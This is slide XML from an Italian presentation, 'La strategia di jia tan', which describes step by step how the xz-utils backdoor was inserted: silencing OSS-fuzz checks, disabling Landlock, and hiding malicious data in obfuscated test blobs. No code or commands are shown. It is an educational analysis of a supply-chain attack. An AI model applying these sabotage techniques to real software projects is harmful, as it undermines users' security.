            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>30 Dicembre 2022: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tan effettua il suo primo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>commit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> nella </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>git</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> repository.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, schermata, Carattere, numero&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AB2FB99-A89F-EEE7-DD58-7120889521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1489" y="2054772"/>
            <a:ext cx="5333781" cy="3869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65040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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11853204" cy="170381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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sabotaggio</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Disabilitazione dei controlli di OSS-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sulla funzionalità IFUNC, sulla quale </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tan farà leva per la backdoor.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Immagine 6" descr="Immagine che contiene testo, schermata, Carattere, numero&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D86D3DE-0B69-3664-F6F3-BE2BC165FA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6565" y="3532184"/>
            <a:ext cx="7033848" cy="3213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47023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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11853204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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sabotaggio</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Modifica di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Landlock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>affinchè</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> non venga mai abilitato. Notare punto a riga 911.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, schermata, Carattere, numero&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01D6D2C8-7978-C50D-4666-CE3750F0E6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66" r="-204"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3123870" y="3214623"/>
            <a:ext cx="5946475" cy="3511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85774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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11853204" cy="89255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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sabotaggio</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Immagine 8" descr="Immagine che contiene testo, schermata, schermo, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3B03102-EC48-4A90-20DA-B0755AD634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769" y="3221117"/>
            <a:ext cx="6096000" cy="2252382"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Immagine 9" descr="Immagine che contiene testo, schermata, Carattere, numero&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E70C9924-A329-2C21-7DD8-10C386C3ED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0847" y="2181905"/>
            <a:ext cx="6096000" cy="3881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75029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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11853204" cy="34778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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Sabotaggio</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Landlock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> fa parte del Linux Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Modules</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> framework del Linux Kernel.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Consente di creare un ambiente di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sandboxing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> attorno all'applicativo interessato così da mitigare l'effetto di bug ed altri comportamenti imprevisti o malevoli.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Per far ciò </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Landlock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> restringe le interazioni che il processo può avere verso oggetti del filesystem o network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Viene disattivato nella versione 5.6.1.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="45358418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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="5318477" cy="458587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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Aggiunta della backdoor</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Aggiunta dei test contenenti dati  necessari alla costruzione della backdoor.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Interessante notare l'applicazione di tecniche di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>offuscamento</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, lontanamente simili ad una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>steganografia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cammuffare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> questi dati malevoli in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>innoqui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> blob di dati per fare testing, così da non destare sospetti.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9F6537CA-926C-3CB0-E527-1CE49AA5D73A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5830453" y="3567545"/>
            <a:ext cx="134215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it-IT" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>[...]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Immagine 12" descr="Immagine che contiene testo, schermata, Carattere, numero&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FB28EA0-7B73-FA7F-75D9-FB6551ED8B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0" y="1697437"/>
            <a:ext cx="6096000" cy="1869854"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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D49811FE-E7B0-FE89-5ED9-E21FF6B7E66A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5830453" y="5126181"/>
            <a:ext cx="134215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it-IT" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>[...]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Immagine 14" descr="Immagine che contiene testo, Carattere, schermata&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF57DFBC-F2FB-3E34-A14D-F9B1E90882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0" y="4233556"/>
            <a:ext cx="6096000" cy="746162"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Immagine 15" descr="Immagine che contiene testo, schermata, Carattere, numero&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C366A4C-EC91-F0A9-8877-DA38232DE9D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" t="51305" r="-10" b="1076"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715000" y="5494143"/>
            <a:ext cx="6096006" cy="573199"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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6CA324EC-4D35-6498-5B9E-FACACADA80BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5830453" y="6153726"/>
            <a:ext cx="134215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it-IT" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>[...]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23695307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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11853204" cy="200054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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Release </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tarball</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
